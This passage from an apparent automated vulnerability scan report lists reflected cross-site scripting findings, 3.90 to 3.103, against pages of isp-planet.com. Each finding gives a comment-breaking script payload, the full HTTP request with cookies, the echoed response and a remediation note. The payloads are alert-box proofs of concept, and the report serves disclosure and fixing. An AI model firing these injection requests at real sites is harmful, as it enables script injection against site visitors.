Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:03 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:03 GMT
Connection: close
Content-Type: text/html
Content-Length: 51255

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
   
<TITLE>ISP Planet - Resources - ISP Planet's List of Internet Lawyers</TIT
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /resources/index_lawyer.html?64e48--><script>alert(1)</script>f0377a27e76=1 -->
...[SNIP]...

3.90. http://www.isp-planet.com/resources/isp_guide/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /resources/isp_guide/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8cb82--><script>alert(1)</script>eaba82c6736 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /resources/isp_guide/index.html?8cb82--><script>alert(1)</script>eaba82c6736=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:38 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:38 GMT
Connection: close
Content-Type: text/html
Content-Length: 58306

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
   
<TITLE>ISP Planet - Resources - Guide to Building an ISP</TITLE>
   
   <META
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /resources/isp_guide/index.html?8cb82--><script>alert(1)</script>eaba82c6736=1 -->
...[SNIP]...

3.91. http://www.isp-planet.com/services/asguide/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/asguide/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload df0d8--><script>alert(1)</script>87a31f9fe67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/asguide/index.html?df0d8--><script>alert(1)</script>87a31f9fe67=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:36 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:36 GMT
Connection: close
Content-Type: text/html
Content-Length: 93557

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<title>ISP-Planet - Value-Added Services - Anti-Spam Directory </title>
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/asguide/index.html?df0d8--><script>alert(1)</script>87a31f9fe67=1 -->
...[SNIP]...

3.92. http://www.isp-planet.com/services/billing/chart.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/billing/chart.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b9e0f--><script>alert(1)</script>fd5147eb06f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/billing/chart.html?b9e0f--><script>alert(1)</script>fd5147eb06f=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:36 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:36 GMT
Connection: close
Content-Type: text/html
Content-Length: 101988

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Value-Added Services - Billing Service Directory Quick R
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/billing/chart.html?b9e0f--><script>alert(1)</script>fd5147eb06f=1 -->
...[SNIP]...

3.93. http://www.isp-planet.com/services/billing/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/billing/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 80cb4--><script>alert(1)</script>f89dfcaeda7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/billing/index.html?80cb4--><script>alert(1)</script>f89dfcaeda7=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:11 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:11 GMT
Connection: close
Content-Type: text/html
Content-Length: 42189

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Value-Added Services - Billing Service Directory</title>
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/billing/index.html?80cb4--><script>alert(1)</script>f89dfcaeda7=1 -->
...[SNIP]...

3.94. http://www.isp-planet.com/services/custsupport/chart.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/custsupport/chart.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6d7a2--><script>alert(1)</script>5b648993c12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/custsupport/chart.html?6d7a2--><script>alert(1)</script>5b648993c12=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:42 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:42 GMT
Connection: close
Content-Type: text/html
Content-Length: 113672

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Value-Added Services - Outsourced Customer Support D
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/custsupport/chart.html?6d7a2--><script>alert(1)</script>5b648993c12=1 -->
...[SNIP]...

3.95. http://www.isp-planet.com/services/custsupport/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/custsupport/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8ec51--><script>alert(1)</script>26fc08aec09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/custsupport/index.html?8ec51--><script>alert(1)</script>26fc08aec09=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:39 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:39 GMT
Connection: close
Content-Type: text/html
Content-Length: 58569

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Value-Added Services - Outsourced Customer Support D
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/custsupport/index.html?8ec51--><script>alert(1)</script>26fc08aec09=1 -->
...[SNIP]...

3.96. http://www.isp-planet.com/services/ids/chart.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/ids/chart.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 746b8--><script>alert(1)</script>c8b224d10e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/ids/chart.html?746b8--><script>alert(1)</script>c8b224d10e9=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:40 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:40 GMT
Connection: close
Content-Type: text/html
Content-Length: 84675

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Value-Added Services - Intrusion Detection Systems Q
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/ids/chart.html?746b8--><script>alert(1)</script>c8b224d10e9=1 -->
...[SNIP]...

3.97. http://www.isp-planet.com/services/ids/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/ids/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload fbb17--><script>alert(1)</script>619ad1475d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/ids/index.html?fbb17--><script>alert(1)</script>619ad1475d6=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:21 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:21 GMT
Connection: close
Content-Type: text/html
Content-Length: 42637

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Value-Added Services - Intrusion Detection Systems D
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/ids/index.html?fbb17--><script>alert(1)</script>619ad1475d6=1 -->
...[SNIP]...

3.98. http://www.isp-planet.com/services/merchants/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/merchants/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 245cd--><script>alert(1)</script>77839477c8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/merchants/index.html?245cd--><script>alert(1)</script>77839477c8c=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:42 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:42 GMT
Connection: close
Content-Type: text/html
Content-Length: 57052

<HTML>
<HEAD>
<title>ISP-Planet - Value-Added Services - Merchant Account Providers Directory</title>
<meta name="channel" content="ISP Resources">
<meta name="author" content="Jeff Goldman">
<me
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/merchants/index.html?245cd--><script>alert(1)</script>77839477c8c=1 -->
...[SNIP]...

3.99. http://www.isp-planet.com/services/registrars/chart.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/registrars/chart.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload bf16b--><script>alert(1)</script>fe099ef085d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/registrars/chart.html?bf16b--><script>alert(1)</script>fe099ef085d=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:39 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:39 GMT
Connection: close
Content-Type: text/html
Content-Length: 85677

<HTML>
<HEAD>
<TITLE>ISP-Planet - Value-Added Services - Registrar Directory</title>
<meta name="channel" content="ISP Resources">
<meta name="author" content="ISP-Planet Staff">
<meta name="company"
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/registrars/chart.html?bf16b--><script>alert(1)</script>fe099ef085d=1 -->
...[SNIP]...

3.100. http://www.isp-planet.com/services/registrars/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/registrars/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a1f04--><script>alert(1)</script>16711f55bfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/registrars/index.html?a1f04--><script>alert(1)</script>16711f55bfb=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:23 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:23 GMT
Connection: close
Content-Type: text/html
Content-Length: 52786

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Value-Added Services - Registrar Directory</title>
<meta
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/registrars/index.html?a1f04--><script>alert(1)</script>16711f55bfb=1 -->
...[SNIP]...

3.101. http://www.isp-planet.com/services/trouble_ticket/chart.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/trouble_ticket/chart.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b81da--><script>alert(1)</script>798b74c10cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/trouble_ticket/chart.html?b81da--><script>alert(1)</script>798b74c10cf=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:43 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:43 GMT
Connection: close
Content-Type: text/html
Content-Length: 64949

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Value-Added Services - Trouble Ticketing Systems Quick R
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/trouble_ticket/chart.html?b81da--><script>alert(1)</script>798b74c10cf=1 -->
...[SNIP]...

3.102. http://www.isp-planet.com/services/trouble_ticket/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/trouble_ticket/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a7a2c--><script>alert(1)</script>70392a62872 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/trouble_ticket/index.html?a7a2c--><script>alert(1)</script>70392a62872=1 HTTP/1.1
Host: www.isp-planet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: QUADIDX=107; intmintc__welcome=; __utmz=101446041.1298033293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_cksm_crc32=42002B10; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026110530:ss=1298026110530; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; qsg=14508; __utma=101446041.732264220.1298033293.1298033293.1298033293.1; __utmc=101446041; _bizo_np_stats=255%3D141%2C337%3D141%2C182%3D1202%2C85%3D1678%2C; __utmb=101446041.2.10.1298033293; toURL=http%3A//www.isp-planet.com/; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 15:13:42 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 15:14:42 GMT
Connection: close
Content-Type: text/html
Content-Length: 49484

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<TITLE>ISP-Planet - Value-Added Services - Trouble Ticketing Systems Directo
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/trouble_ticket/index.html?a7a2c--><script>alert(1)</script>70392a62872=1 -->
...[SNIP]...

3.103. http://www.isp-planet.com/services/voip_wholesalers/chart.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.isp-planet.com
Path:   /services/voip_wholesalers/chart.html

Issue detail

